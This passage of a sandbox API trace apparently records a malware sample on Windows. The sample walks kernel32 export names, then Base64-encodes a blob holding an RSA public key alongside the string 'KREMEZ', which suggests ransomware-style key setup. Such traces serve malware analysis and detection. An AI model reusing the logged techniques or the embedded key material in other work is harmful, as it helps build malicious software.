returned 37 [0051.668] lstrcpyA (in: lpString1=0xc9d338, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0051.668] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0051.668] lstrcpyA (in: lpString1=0xc9d338, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0051.668] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0051.669] lstrcpyA (in: lpString1=0xc9d338, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0051.669] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0051.669] lstrcpyA (in: lpString1=0xc9d338, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0051.669] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0051.669] lstrcpyA (in: lpString1=0xc9d338, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0051.669] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0051.669] lstrcpyA (in: lpString1=0xc9d338, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0051.669] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0051.669] lstrcpyA (in: lpString1=0xc9d338, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0051.669] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0051.669] lstrcpyA (in: lpString1=0xc9d338, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0051.669] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0051.669] lstrcpyA (in: lpString1=0xc9d338, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0051.669] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0051.669] lstrcpyA (in: lpString1=0xc9d338, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0051.669] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0051.669] lstrcpyA (in: lpString1=0xc9d338, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0051.669] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0051.669] lstrcpyA (in: lpString1=0xc9d338, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0051.669] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0051.669] lstrcpyA (in: lpString1=0xc9d338, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0051.669] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0051.669] lstrcpyA (in: lpString1=0xc9d338, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0051.669] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0051.669] lstrcpyA (in: lpString1=0xc9d338, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0051.669] lstrlenA (lpString="BEEP") returned 4 [0051.669] lstrcpyA (in: lpString1=0xc9d338, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0051.669] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0051.669] lstrcpyA (in: lpString1=0xc9d338, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0051.669] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0051.669] lstrcpyA (in: lpString1=0xc9d338, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0051.669] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0051.669] lstrcpyA (in: lpString1=0xc9d338, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0051.669] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0051.669] lstrcpyA (in: lpString1=0xc9d338, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0051.669] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0051.669] lstrcpyA (in: lpString1=0xc9d338, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0051.670] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0051.670] lstrcpyA (in: lpString1=0xc9d338, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0051.670] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0051.670] lstrcpyA (in: lpString1=0xc9d338, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0051.670] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0051.670] lstrcpyA (in: lpString1=0xc9d338, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0051.670] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0051.670] lstrcpyA (in: lpString1=0xc9d338, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0051.670] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0051.670] lstrcpyA (in: lpString1=0xc9d338, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0051.670] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0051.670] lstrcpyA (in: lpString1=0xc9d338, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0051.670] lstrlenA (lpString="CANCELIO") returned 8 [0051.670] lstrcpyA (in: lpString1=0xc9d338, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0051.670] lstrlenA (lpString="CANCELIOEX") returned 10 [0051.670] lstrcpyA (in: lpString1=0xc9d338, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0051.670] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0051.670] lstrcpyA (in: lpString1=0xc9d338, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0051.670] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0051.670] lstrcpyA (in: lpString1=0xc9d338, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0051.670] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0051.670] lstrcpyA (in: lpString1=0xc9d338, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0051.670] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0051.670] lstrcpyA (in: lpString1=0xc9d338, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0051.670] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0051.670] lstrcpyA (in: lpString1=0xc9d338, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0051.670] lstrlenA (lpString="CHECKELEVATION") returned 14 [0051.670] lstrcpyA (in: lpString1=0xc9d338, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0051.670] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0051.670] lstrcpyA (in: lpString1=0xc9d338, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0051.670] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0051.670] lstrcpyA (in: lpString1=0xc9d338, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0051.670] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0051.670] lstrcpyA (in: lpString1=0xc9d338, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0051.670] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0051.670] lstrcpyA (in: lpString1=0xc9d338, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0051.670] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0051.670] lstrcpyA (in: lpString1=0xc9d338, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0051.670] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0051.671] lstrcpyA (in: lpString1=0xc9d338, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0051.671] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0051.671] lstrcpyA (in: lpString1=0xc9d338, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0051.671] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0051.671] lstrcpyA (in: lpString1=0xc9d338, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0051.671] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0051.671] lstrcpyA (in: lpString1=0xc9d338, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0051.671] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0051.671] lstrcpyA (in: lpString1=0xc9d338, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0051.671] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0051.671] lstrcpyA (in: lpString1=0xc9d338, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0051.671] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0051.671] lstrcpyA (in: lpString1=0xc9d338, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0051.671] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0051.671] lstrcpyA (in: lpString1=0xc9d338, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0051.671] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0051.671] lstrcpyA (in: lpString1=0xc9d338, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0051.671] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0051.671] lstrcpyA (in: lpString1=0xc9d338, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0051.671] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0051.671] lstrcpyA (in: lpString1=0xc9d338, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0051.671] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0051.671] lstrcpyA (in: lpString1=0xc9d338, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0051.671] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0051.671] lstrcpyA (in: lpString1=0xc9d338, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0051.671] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0051.671] lstrcpyA (in: lpString1=0xc9d338, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0051.671] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0051.671] lstrcpyA (in: lpString1=0xc9d338, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0051.671] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0051.671] lstrcpyA (in: lpString1=0xc9d338, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0051.671] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0051.671] lstrcpyA (in: lpString1=0xc9d338, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0051.671] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0051.671] lstrcpyA (in: lpString1=0xc9d338, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0051.671] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0051.671] lstrcpyA (in: lpString1=0xc9d338, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0051.671] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0051.671] lstrcpyA (in: lpString1=0xc9d338, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0051.672] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0051.672] lstrcpyA (in: lpString1=0xc9d338, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0051.672] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0051.672] lstrcpyA (in: lpString1=0xc9d338, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0051.672] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0051.672] lstrcpyA (in: lpString1=0xc9d338, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0051.672] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0051.672] lstrcpyA (in: lpString1=0xc9d338, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0051.672] lstrcpyA (in: lpString1=0xc9d338, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0051.672] CryptBinaryToStringA (in: pbBinary=0xc9e7a0, cbBinary=0x7a8, dwFlags=0x40000001, pszString=0x0, pcchString=0xc9dfe0 | out: pszString=0x0, pcchString=0xc9dfe0) returned 1 [0051.675] VirtualAlloc (lpAddress=0x0, dwSize=0xa39, flAllocationType=0x3000, flProtect=0x4) returned 0xf10000 [0051.675] CryptBinaryToStringA (in: pbBinary=0xc9e7a0, cbBinary=0x7a8, dwFlags=0x40000001, pszString=0xf10000, pcchString=0xc9dfe0 | out: pszString="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", pcchString=0xc9dfe0) returned 1 [0051.675] lstrlenA (lpString="KREMEZ") returned 6 [0051.675] lstrlenA (lpString="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") returned 2616 [0051.675] VirtualAlloc (lpAddress=0x0, dwSize=0xa4c, flAllocationType=0x3000, flProtect=0x4) returned 0xf20000 [0051.676] lstrlenA (lpString="KREMEZ") returned 6 [0051.676] lstrlenA (lpString="1ujMBzMtWcg3j3csHFRTbG1OlFICZ2fF0SGosgxjcchu1MDIMly7CBAb4B+bIIeacNA7gqH05ksgSzA1rko+JhzG1aEZOxLV3NYO5/EiAH4Kdwgx07IijKtjA5jxSXRm8yHP9wQ2l9ZNWGniP+Ni5QI0KZKq+Nu+Lm0xfW6xZlgQuJ7gAcARahMWVmOt0CQfcxWXZPx/vAHewaxheaoOi+B6+PBHxvXhL37U/Qpa+KS3uA4mtoYGeQ0pBJhdLI94GnMqjwxH8okQgxbR/diYd4HmSXPVJnAH45cWUxlwWHi17tPcZsNoupdks4kuppSnc4mjJ6fxGCs8Yh9IF4iPQzkJ9479qQUbSlPvw0Q4Wy2ufAlaEdKQKylpinkoykAH9haZuRzjQeLAZ6z2bE/kg2jDl2HXUp7vC3sp2c6dGQR7W7rNOyxIqOYr+K1y7k8OeCfjzkOrSwkdhjPPMdyRpM//AZ/Klo7xajKVRqEDd+HWQvQfdxutG90dsyaFsz4cOThvcqAKiko93ph1UlLusFoSDSoATUqhYbucHlsFyl3KiMgnENT232fraqUcgUPv6WMMwK3L/oU1bQR8gzPDrP9mfq4rpOdVr5Mm5OlL0BqKE9uG4eB8LL8PRqSXCn6xSnvXRelGPBV2M4iWCQ6fNdHlDBb8eYoGdWrmTf5ceGztp8iWOwAvIdTE0VDE/iZPwhbwFA9H58EEZcER9eZDOyPo57GhGD0QKkZrjkakRe+M+zXqRnLMe/FjU3mmx8v1BW1d2ETKGfw+KmeVPDVs36/oWXMh8GDvndaaM7+0zxA4kaLihe2VHwwZraBNH2A7P1jvFMqTaLzSRDyh4BDtHyp0RSyOARjaK9bnyzFqXldxL91VUtNBItsKZvO44rK/c2ENr+RO0a0djv1NsTIzqk0QVttVeMYWV/Kphx5aGKfv6c3RexlncEyJ+q5fabIcuE+yrqYk+AMMC1HHZAZQnJt8JEc7ObLZCFX7GMH8uUqRt4VY6rCTsVCC5Si4/UBR6LLjKBLHXuGVwLpUOrsJjj/3zZJHM08ezZC/uCMZKx6/8LQFz47DFYs3/kG0RvYzxMZcXTMVCZ91MhUfEYtxIaTWQ4/C4f9cgIhnBLbKZcXjBk76LWjAWhA/yRD2EyKi2iFcryMv+U3sVCaXhPjMNjB32Vga3NBtJ4lFrkr2j8D7lwXTJq7F6pqPAP3oRTNmH/em4xUX4Ifx9Y1Ee54/BfonTTd3V6SDG9swfJRm8IvoSOhIqwJbERSM1lb91BrQyNHUPc+ATkYuB3CHxa9h+rJZGaE/MaytdSkjSPZF8xCWBvqIhaLgu2TCMYdJrVtRZyEs+G8R7JzU1zppCj3TMjRisS0C5vcuT6p6npiTEVQZ0RjSFmp57a4onMw4hy7kO98H/yaJfa/9jvnuMg/yOrS/sE0fk7MQUn7QbOy4YVdfEURHMBuzF6RcyH08o7q71oflLpJmqDw5357A6mtWv052N8rpV9PnCXuf4D7I3aWEwb5kDkOg37+MQzcuamSeRMDDU4xKUfszFm99Se+7DU7KHgz/xS9OnreaGVvoyeD6Wo/+2ySbTiofDJ00u9w4pQ8carEc87DMDr6HSi7D0tB4qKfmlOwoeD+wQVdxnH6m+Oe0fpWhk7xBvssGNw4coIY4J4rQx3e0Mda84GHHB8YQN4s5fsDhYijiQatKqvs+eaMdYiMFKqJV9DRoBkStGooClvOh2LwVMPe4aJufA2ECH4zkMHJRZUTqB/bHAacGN2baG8ivcwJsnYj2dsc93tzJDCkmxyIMqbtyqmTRJIvEv4K51A3dZDD2dvx/oHCjbIUfL9N9vr8vnejMVI2XJVafVhAs1C3/CUyOsrhrSH2/BaeNuSjCgEBQH3JVNd5wuQ6V+fFQjCmE23nFn/RXrWhl5gd5fiSFrvPREpiH+BeCGnpiTiTGjIHL7VAYhu7DQ6KVo54swkswxLclqp